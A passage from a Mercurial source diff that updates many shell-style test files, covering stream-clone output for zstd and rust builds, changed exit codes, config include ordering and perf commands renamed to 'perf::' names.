-x mercurial/testing/storage.py \ + > -x mercurial/thirdparty \ + > -x mercurial/ui.py \ + > -x mercurial/unionrepo.py \ + > -x mercurial/upgrade.py \ + > -x mercurial/utils/procutil.py \ + > -x
mercurial/utils/stringutil.py \ + > -x mercurial/utils/memorytop.py \ + > -x mercurial/win32.py \ + > -x mercurial/wireprotoframing.py \ + > -x mercurial/wireprotoserver.py \ + > -x mercurial/wireprotov1peer.py \ + > -x mercurial/wireprotov1server.py \ + > -x mercurial/wireprotov2server.py \ + > > $TESTTMP/pytype-output.txt || cat $TESTTMP/pytype-output.txt + +Only show the results on a failure, because the output on success is also +voluminous and variable. diff --git a/tests/test-churn.t b/tests/test-churn.t --- a/tests/test-churn.t +++ b/tests/test-churn.t @@ -195,3 +195,22 @@ alltogether 11 ********************************************************* $ cd .. + +count lines that look like headings but are not + + $ hg init not-headers + $ cd not-headers + $ cat > a <<EOF + > diff + > @@ -195,3 +195,21 @@ + > -- a/tests/test-churn.t + > ++ b/tests/test-churn.t + > EOF + $ hg ci -Am adda -u user1 + adding a + $ hg churn --diffstat + user1 +4/-0 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ + $ hg rm a + $ hg ci -Am removea -u user1 + $ hg churn --diffstat + user1 +4/-4 +++++++++++++++++++++++++++--------------------------- diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -73,7 +73,6 @@ remote-changegroup http https - rev-branch-cache $ hg clone --stream -U http://localhost:$HGPORT server-disabled warning: stream clone requested but server has them disabled @@ -141,7 +140,6 @@ remote-changegroup http https - rev-branch-cache $ hg clone --stream -U http://localhost:$HGPORT server-disabled warning: stream clone requested but server has them disabled @@ -171,7 +169,7 @@ $ killdaemons.py $ cd server - $ hg serve -p $HGPORT -d --pid-file=hg.pid + $ hg serve -p $HGPORT -d --pid-file=hg.pid --error errors.txt $ cat hg.pid > $DAEMON_PIDS $ cd .. 
@@ -180,16 +178,21 @@ #if stream-legacy $ hg clone --stream -U http://localhost:$HGPORT clone1 streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found + $ cat server/errors.txt #endif #if stream-bundle2 $ hg clone --stream -U http://localhost:$HGPORT clone1 streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) + transferred 96.5 KB in * seconds (*/sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) $ ls -1 clone1/.hg/cache branch2-base @@ -203,6 +206,7 @@ rbc-revs-v1 tags2 tags2-served + $ cat server/errors.txt #endif getbundle requests with stream=1 are uncompressed @@ -213,39 +217,68 @@ $ f --size --hex --bytes 256 body - body: size=112262 + body: size=112262 (no-zstd !) + body: size=109410 (zstd no-rust !) + body: size=109431 (rust !) 0000: 04 6e 6f 6e 65 48 47 32 30 00 00 00 00 00 00 00 |.noneHG20.......| - 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| - 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| - 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| + 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (no-zstd !) + 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| (no-zstd !) + 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| (no-zstd !) + 0010: 99 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (zstd no-rust !) 
+ 0010: ae 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (rust !) + 0020: 05 09 04 0c 5e 62 79 74 65 63 6f 75 6e 74 39 35 |....^bytecount95| (zstd no-rust !) + 0020: 05 09 04 0c 73 62 79 74 65 63 6f 75 6e 74 39 35 |....sbytecount95| (rust !) + 0030: 38 39 37 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |897filecount1030| (zstd !) 0040: 72 65 71 75 69 72 65 6d 65 6e 74 73 64 6f 74 65 |requirementsdote| 0050: 6e 63 6f 64 65 25 32 43 66 6e 63 61 63 68 65 25 |ncode%2Cfncache%| 0060: 32 43 67 65 6e 65 72 61 6c 64 65 6c 74 61 25 32 |2Cgeneraldelta%2| - 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar| - 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore| - 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.| - 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................| - 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 |................| - 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i| - 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| - 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| - 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| + 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar| (no-zstd !) + 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore| (no-zstd !) + 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.| (no-zstd !) + 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................| (no-zstd !) + 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 |................| (no-zstd !) + 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i| (no-zstd !) + 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| (no-zstd !) + 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| (no-zstd !) 
+ 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| (no-zstd !) + 0070: 43 72 65 76 6c 6f 67 2d 63 6f 6d 70 72 65 73 73 |Crevlog-compress| (zstd no-rust !) + 0070: 43 70 65 72 73 69 73 74 65 6e 74 2d 6e 6f 64 65 |Cpersistent-node| (rust !) + 0080: 69 6f 6e 2d 7a 73 74 64 25 32 43 72 65 76 6c 6f |ion-zstd%2Crevlo| (zstd no-rust !) + 0080: 6d 61 70 25 32 43 72 65 76 6c 6f 67 2d 63 6f 6d |map%2Crevlog-com| (rust !) + 0090: 67 76 31 25 32 43 73 70 61 72 73 65 72 65 76 6c |gv1%2Csparserevl| (zstd no-rust !) + 0090: 70 72 65 73 73 69 6f 6e 2d 7a 73 74 64 25 32 43 |pression-zstd%2C| (rust !) + 00a0: 6f 67 25 32 43 73 74 6f 72 65 00 00 80 00 73 08 |og%2Cstore....s.| (zstd no-rust !) + 00a0: 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 73 |revlogv1%2Cspars| (rust !) + 00b0: 42 64 61 74 61 2f 30 2e 69 00 03 00 01 00 00 00 |Bdata/0.i.......| (zstd no-rust !) + 00b0: 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 00 |erevlog%2Cstore.| (rust !) + 00c0: 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 |................| (zstd no-rust !) + 00c0: 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 03 |...s.Bdata/0.i..| (rust !) + 00d0: 01 ff ff ff ff ff ff ff ff 80 29 63 a0 49 d3 23 |..........)c.I.#| (zstd no-rust !) + 00d0: 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 00 |................| (rust !) + 00e0: 87 bf ce fe 56 67 92 67 2c 69 d1 ec 39 00 00 00 |....Vg.g,i..9...| (zstd no-rust !) + 00e0: 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 29 |...............)| (rust !) + 00f0: 00 00 00 00 00 00 00 00 00 75 30 73 08 42 64 61 |.........u0s.Bda| (zstd no-rust !) + 00f0: 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 d1 |c.I.#....Vg.g,i.| (rust !) --uncompressed is an alias to --stream #if stream-legacy $ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) 
+ transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found #endif #if stream-bundle2 $ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) + transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) #endif Clone with background file closing enabled @@ -257,10 +290,12 @@ sending branchmap command streaming all changes sending stream_out command - 1027 files to transfer, 96.3 KB of data + 1027 files to transfer, 96.3 KB of data (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) starting 4 threads for background file closing updating the branch cache - transferred 96.3 KB in * seconds (*/sec) (glob) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) query 1; heads sending batch command searching for changes @@ -287,12 +322,15 @@ bundle2-input-bundle: with-transaction bundle2-input-part: "stream2" (params: 3 mandatory) supported applying stream bundle - 1030 files to transfer, 96.5 KB of data + 1030 files to transfer, 96.5 KB of data (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) starting 4 threads for background file closing starting 4 threads for background file closing updating the branch cache - transferred 96.5 KB in * seconds (* */sec) (glob) - bundle2-input-part: total payload size 112094 + transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + bundle2-input-part: total payload size 112094 (no-zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) 
+ bundle2-input-part: total payload size 109216 (zstd !) bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-bundle: 2 parts total checking for updated bookmarks @@ -324,16 +362,20 @@ #if stream-legacy $ hg clone --stream -U http://localhost:$HGPORT secret-allowed streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found #endif #if stream-bundle2 $ hg clone --stream -U http://localhost:$HGPORT secret-allowed streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) + transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) 
#endif $ killdaemons.py @@ -368,7 +410,7 @@ remote: abort: server has pull-based clones disabled abort: pull failed on remote (remove --pull if specified or upgrade Mercurial) - [255] + [100] Local stream clone with secrets involved (This is just a test over behavior: if you have access to the repo's files, @@ -391,14 +433,35 @@ extension for delaying the server process so we reliably can modify the repo while cloning - $ cat > delayer.py <<EOF - > import time - > from mercurial import extensions, vfs - > def __call__(orig, self, path, *args, **kwargs): - > if path == 'data/f1.i': - > time.sleep(2) - > return orig(self, path, *args, **kwargs) - > extensions.wrapfunction(vfs.vfs, '__call__', __call__) + $ cat > stream_steps.py <<EOF + > import os + > import sys + > from mercurial import ( + > encoding, + > extensions, + > streamclone, + > testing, + > ) + > WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1'] + > WALKED_FILE_2 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2'] + > + > def _test_sync_point_walk_1(orig, repo): + > testing.write_file(WALKED_FILE_1) + > + > def _test_sync_point_walk_2(orig, repo): + > assert repo._currentlock(repo._lockref) is None + > testing.wait_file(WALKED_FILE_2) + > + > extensions.wrapfunction( + > streamclone, + > '_test_sync_point_walk_1', + > _test_sync_point_walk_1 + > ) + > extensions.wrapfunction( + > streamclone, + > '_test_sync_point_walk_2', + > _test_sync_point_walk_2 + > ) > EOF prepare repo with small and big file to cover both code paths in emitrevlogdata @@ -407,20 +470,32 @@ $ touch repo/f1 $ $TESTDIR/seq.py 50000 > repo/f2 $ hg -R repo ci -Aqm "0" - $ hg serve -R repo -p $HGPORT1 -d --pid-file=hg.pid --config extensions.delayer=delayer.py + $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1" + $ export HG_TEST_STREAM_WALKED_FILE_1 + $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2" + $ export HG_TEST_STREAM_WALKED_FILE_2 + $ 
HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3" + $ export HG_TEST_STREAM_WALKED_FILE_3 +# $ cat << EOF >> $HGRCPATH +# > [hooks] +# > pre-clone=rm -f "$TESTTMP/sync_file_walked_*" +# > EOF + $ hg serve -R repo -p $HGPORT1 -d --error errors.log --pid-file=hg.pid --config extensions.stream_steps="$RUNTESTDIR/testlib/ext-stream-clone-steps.py" $ cat hg.pid >> $DAEMON_PIDS clone while modifying the repo between stating file with write lock and actually serving file content - $ hg clone -q --stream -U http://localhost:$HGPORT1 clone & - $ sleep 1 + $ (hg clone -q --stream -U http://localhost:$HGPORT1 clone; touch "$HG_TEST_STREAM_WALKED_FILE_3") & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 $ echo >> repo/f1 $ echo >> repo/f2 $ hg -R repo ci -m "1" --config ui.timeout.warn=-1 - $ wait + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 $ hg -R clone id 000000000000 + $ cat errors.log $ cd .. Stream repository with bookmarks @@ -439,8 +514,10 @@ #if stream-legacy $ hg clone --stream http://localhost:$HGPORT with-bookmarks streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -449,8 +526,10 @@ #if stream-bundle2 $ hg clone --stream http://localhost:$HGPORT with-bookmarks streaming all changes - 1033 files to transfer, 96.6 KB of data - transferred 96.6 KB in * seconds (* */sec) (glob) + 1033 files to transfer, 96.6 KB of data (no-zstd !) + transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !) + 1033 files to transfer, 93.8 KB of data (zstd !) + transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !) 
updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved #endif @@ -469,8 +548,10 @@ #if stream-legacy $ hg clone --stream http://localhost:$HGPORT phase-publish streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -479,8 +560,10 @@ #if stream-bundle2 $ hg clone --stream http://localhost:$HGPORT phase-publish streaming all changes - 1033 files to transfer, 96.6 KB of data - transferred 96.6 KB in * seconds (* */sec) (glob) + 1033 files to transfer, 96.6 KB of data (no-zstd !) + transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !) + 1033 files to transfer, 93.8 KB of data (zstd !) + transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !) updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved #endif @@ -505,8 +588,10 @@ $ hg clone --stream http://localhost:$HGPORT phase-no-publish streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (* */sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -518,8 +603,10 @@ #if stream-bundle2 $ hg clone --stream http://localhost:$HGPORT phase-no-publish streaming all changes - 1034 files to transfer, 96.7 KB of data - transferred 96.7 KB in * seconds (* */sec) (glob) + 1034 files to transfer, 96.7 KB of data (no-zstd !) + transferred 96.7 KB in * seconds (* */sec) (glob) (no-zstd !) 
+ 1034 files to transfer, 93.9 KB of data (zstd !) + transferred 93.9 KB in * seconds (* */sec) (glob) (zstd !) updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg -R phase-no-publish phase -r 'all()' @@ -563,8 +650,10 @@ $ hg clone -U --stream http://localhost:$HGPORT with-obsolescence streaming all changes - 1035 files to transfer, 97.1 KB of data - transferred 97.1 KB in * seconds (* */sec) (glob) + 1035 files to transfer, 97.1 KB of data (no-zstd !) + transferred 97.1 KB in * seconds (* */sec) (glob) (no-zstd !) + 1035 files to transfer, 94.3 KB of data (zstd !) + transferred 94.3 KB in * seconds (* */sec) (glob) (zstd !) $ hg -R with-obsolescence log -T '{rev}: {phase}\n' 1: draft 0: draft @@ -575,7 +664,7 @@ streaming all changes remote: abort: server has obsolescence markers, but client cannot receive them via stream clone abort: pull failed on remote - [255] + [100] $ killdaemons.py diff --git a/tests/test-clonebundles.t b/tests/test-clonebundles.t --- a/tests/test-clonebundles.t +++ b/tests/test-clonebundles.t @@ -279,7 +279,8 @@ $ hg -R server debugcreatestreamclonebundle packed.hg writing 613 bytes for 4 files - bundle requirements: generaldelta, revlogv1, sparserevlog + bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) 
No bundle spec should work @@ -589,9 +590,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 59 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 2 changesets with 2 changes to 2 files diff --git a/tests/test-commandserver.t b/tests/test-commandserver.t --- a/tests/test-commandserver.t +++ b/tests/test-commandserver.t @@ -522,7 +522,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand verify checking changesets checking manifests @@ -1013,7 +1013,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand log *** runcommand verify -q @@ -1057,7 +1057,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand log 0 bar (bar) *** runcommand verify -q diff --git a/tests/test-commit-amend.t b/tests/test-commit-amend.t --- a/tests/test-commit-amend.t +++ b/tests/test-commit-amend.t @@ -209,7 +209,7 @@ transaction abort! rollback completed abort: pretxncommit.test-saving-last-message hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt message given from command line (no-eol) @@ -234,7 +234,7 @@ transaction abort! 
rollback completed abort: pretxncommit.test-saving-last-message hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt another precious commit message diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -38,6 +38,7 @@ paths phase pull + purge push recover remove @@ -129,6 +130,7 @@ debugrevspec debugserve debugsetparents + debugshell debugsidedata debugssl debugstrip @@ -270,7 +272,7 @@ debugbuilddag: mergeable-file, overwritten-file, new-file debugbundle: all, part-type, spec debugcapabilities: - debugchangedfiles: + debugchangedfiles: compute debugcheckstate: debugcolor: style debugcommands: @@ -281,7 +283,7 @@ debugdate: extended debugdeltachain: changelog, manifest, dir, template debugdirstate: nodates, dates, datesort - debugdiscovery: old, nonheads, rev, seed, ssh, remotecmd, insecure + debugdiscovery: old, nonheads, rev, seed, local-as-revs, remote-as-revs, ssh, remotecmd, insecure, template debugdownload: output debugextensions: template debugfileset: rev, all-files, show-matcher, show-stage @@ -318,6 +320,7 @@ debugrevspec: optimize, show-revs, show-set, show-stage, no-optimized, verify-optimized debugserve: sshstdio, logiofd, logiofile debugsetparents: + debugshell: debugsidedata: changelog, manifest, dir debugssl: debugstrip: rev, force, no-backup, nobackup, , keep, bookmark, soft @@ -354,10 +357,11 @@ paths: template phase: public, draft, secret, force, rev pull: update, force, confirm, rev, bookmark, branch, ssh, remotecmd, insecure + purge: abort-on-err, all, ignored, dirs, files, print, print0, confirm, include, exclude push: force, rev, bookmark, all-bookmarks, branch, new-branch, pushvars, publish, ssh, remotecmd, insecure recover: verify remove: after, force, subrepos, include, exclude, dry-run - rename: after, at-rev, force, include, exclude, dry-run + rename: forget, after, at-rev, force, include, exclude, dry-run resolve: all, list, mark, unmark, no-status, 
re-merge, tool, include, exclude, template revert: all, date, rev, no-backup, interactive, include, exclude, dry-run rollback: dry-run, force diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -1,3 +1,17 @@ +Windows needs ';' as a file separator in an environment variable, and MSYS +doesn't automatically convert it in every case. + +#if windows + $ path_list_var() { + > echo $1 | sed 's/:/;/' + > } +#else + $ path_list_var() { + > echo $1 + > } +#endif + + hide outer repo $ hg init @@ -388,3 +402,114 @@ > done $ HGRCPATH=configs hg config section.key 99 + +Configuration priority +====================== + +setup necessary file + + $ cat > file-A.rc << EOF + > [config-test] + > basic = value-A + > pre-include= value-A + > %include ./included.rc + > post-include= value-A + > [command-templates] + > log = "value-A\n" + > EOF + + $ cat > file-B.rc << EOF + > [config-test] + > basic = value-B + > [ui] + > logtemplate = "value-B\n" + > EOF + + + $ cat > included.rc << EOF + > [config-test] + > pre-include= value-included + > post-include= value-included + > EOF + + $ cat > file-C.rc << EOF + > %include ./included-alias-C.rc + > [ui] + > logtemplate = "value-C\n" + > EOF + + $ cat > included-alias-C.rc << EOF + > [command-templates] + > log = "value-included\n" + > EOF + + + $ cat > file-D.rc << EOF + > [command-templates] + > log = "value-D\n" + > %include ./included-alias-D.rc + > EOF + + $ cat > included-alias-D.rc << EOF + > [ui] + > logtemplate = "value-included\n" + > EOF + +Simple order checking +--------------------- + +If file B is read after file A, value from B overwrite value from A. 
+ + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic + value-B + +Ordering from include +--------------------- + +value from an include overwrites a value defined before the include, but not the one defined after the include + + $ HGRCPATH="file-A.rc" hg config config-test.pre-include + value-included + $ HGRCPATH="file-A.rc" hg config config-test.post-include + value-A + +command line override +--------------------- + + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic --config config-test.basic=value-CLI + value-CLI + +Alias ordering +-------------- + +The official config is now `command-templates.log`, the historical +`ui.logtemplate` is a valid alternative for it. + +When both are defined, the config value read last "wins"; this should keep +being true if the config has other aliases. In other words, the config value read +earlier will be considered "lower level" and the config read later would be +considered "higher level". And higher level values win. + + $ HGRCPATH="file-A.rc" hg log -r . + value-A + $ HGRCPATH="file-B.rc" hg log -r . + value-B + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r . + value-B + +Alias and include +----------------- + +The pre/post include priority should also apply when tie-breaking alternatives. +See the case above for details about the two config options used. + + $ HGRCPATH="file-C.rc" hg log -r . + value-C + $ HGRCPATH="file-D.rc" hg log -r . + value-included + +command line override +--------------------- + + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r .
--config ui.logtemplate="value-CLI\n" + value-CLI diff --git a/tests/test-contrib-perf.t b/tests/test-contrib-perf.t --- a/tests/test-contrib-perf.t +++ b/tests/test-contrib-perf.t @@ -78,111 +78,137 @@ list of commands: - perfaddremove + perf::addremove + (no help text available) + perf::ancestors (no help text available) - perfancestors + perf::ancestorset (no help text available) - perfancestorset + perf::annotate (no help text available) - perfannotate (no help text available) - perfbdiff benchmark a bdiff between revisions - perfbookmarks + perf::bdiff benchmark a bdiff between revisions + perf::bookmarks benchmark parsing bookmarks from disk to memory - perfbranchmap + perf::branchmap benchmark the update of a branchmap - perfbranchmapload + perf::branchmapload benchmark reading the branchmap - perfbranchmapupdate + perf::branchmapupdate benchmark branchmap update from for <base> revs to <target> revs - perfbundleread + perf::bundleread Benchmark reading of bundle files. - perfcca (no help text available) - perfchangegroupchangelog + perf::cca (no help text available) + perf::changegroupchangelog Benchmark producing a changelog group for a changegroup. 
- perfchangeset + perf::changeset + (no help text available) + perf::ctxfiles (no help text available) - perfctxfiles (no help text available) - perfdiffwd Profile diff of working directory changes - perfdirfoldmap + perf::diffwd Profile diff of working directory changes + perf::dirfoldmap benchmap a 'dirstate._map.dirfoldmap.get()' request - perfdirs (no help text available) - perfdirstate benchmap the time of various distate operations - perfdirstatedirs + perf::dirs (no help text available) + perf::dirstate + benchmap the time of various distate operations + perf::dirstatedirs benchmap a 'dirstate.hasdir' call from an empty 'dirs' cache - perfdirstatefoldmap + perf::dirstatefoldmap benchmap a 'dirstate._map.filefoldmap.get()' request - perfdirstatewrite + perf::dirstatewrite benchmap the time it take to write a dirstate on disk - perfdiscovery + perf::discovery benchmark discovery between local repo and the peer at given path - perffncacheencode + perf::fncacheencode (no help text available) - perffncacheload + perf::fncacheload (no help text available) - perffncachewrite + perf::fncachewrite (no help text available) - perfheads benchmark the computation of a changelog heads - perfhelper-mergecopies + perf::heads benchmark the computation of a changelog heads + perf::helper-mergecopies find statistics about potential parameters for 'perfmergecopies' - perfhelper-pathcopies + perf::helper-pathcopies find statistic about potential parameters for the 'perftracecopies' - perfignore benchmark operation related to computing ignore - perfindex benchmark index creation time followed by a lookup - perflinelogedits + perf::ignore benchmark operation related to computing ignore + perf::index benchmark index creation time followed by a lookup + perf::linelogedits (no help text available) - perfloadmarkers + perf::loadmarkers benchmark the time to parse the on-disk markers for a repo - perflog (no help text available) - perflookup (no help text available) - perflrucachedict 
+ perf::log (no help text available) + perf::lookup (no help text available) + perf::lrucachedict (no help text available) - perfmanifest benchmark the time to read a manifest from disk and return a + perf::manifest + benchmark the time to read a manifest from disk and return a usable - perfmergecalculate + perf::mergecalculate (no help text available) - perfmergecopies + perf::mergecopies measure runtime of 'copies.mergecopies' - perfmoonwalk benchmark walking the changelog backwards - perfnodelookup + perf::moonwalk + benchmark walking the changelog backwards + perf::nodelookup (no help text available) - perfnodemap benchmark the time necessary to look up revision from a cold + perf::nodemap + benchmark the time necessary to look up revision from a cold nodemap - perfparents benchmark the time necessary to fetch one changeset's parents. - perfpathcopies + perf::parents + benchmark the time necessary to fetch one changeset's parents. + perf::pathcopies benchmark the copy tracing logic - perfphases benchmark phasesets computation - perfphasesremote + perf::phases benchmark phasesets computation + perf::phasesremote benchmark time needed to analyse phases of the remote server - perfprogress printing of progress bars - perfrawfiles (no help text available) - perfrevlogchunks + perf::progress + printing of progress bars + perf::rawfiles + (no help text available) + perf::revlogchunks Benchmark operations on revlog chunks. - perfrevlogindex + perf::revlogindex Benchmark operations against a revlog index. - perfrevlogrevision + perf::revlogrevision Benchmark obtaining a revlog revision. - perfrevlogrevisions + perf::revlogrevisions Benchmark reading a series of revisions from a revlog. - perfrevlogwrite + perf::revlogwrite Benchmark writing a series of revisions to a revlog. 
- perfrevrange (no help text available) - perfrevset benchmark the execution time of a revset - perfstartup (no help text available) - perfstatus benchmark the performance of a single status call - perftags (no help text available) - perftemplating + perf::revrange + (no help text available) + perf::revset benchmark the execution time of a revset + perf::startup + (no help text available) + perf::status benchmark the performance of a single status call + perf::tags (no help text available) + perf::templating test the rendering time of a given template - perfunidiff benchmark a unified diff between revisions - perfvolatilesets + perf::unidiff + benchmark a unified diff between revisions + perf::volatilesets benchmark the computation of various volatile set - perfwalk (no help text available) - perfwrite microbenchmark ui.write (and others) + perf::walk (no help text available) + perf::write microbenchmark ui.write (and others) (use 'hg help -v perf' to show built-in aliases and global options) + + $ hg help perfaddremove + hg perf::addremove + + aliases: perfaddremove + + (no help text available) + + options: + + -T --template TEMPLATE display with template + + (some details hidden, use --verbose to show complete help) + $ hg perfaddremove $ hg perfancestors $ hg perfancestorset 2 diff --git a/tests/test-convert-cvs.t b/tests/test-convert-cvs.t --- a/tests/test-convert-cvs.t +++ b/tests/test-convert-cvs.t @@ -521,7 +521,7 @@ |cp932 |\x82\xa0 | 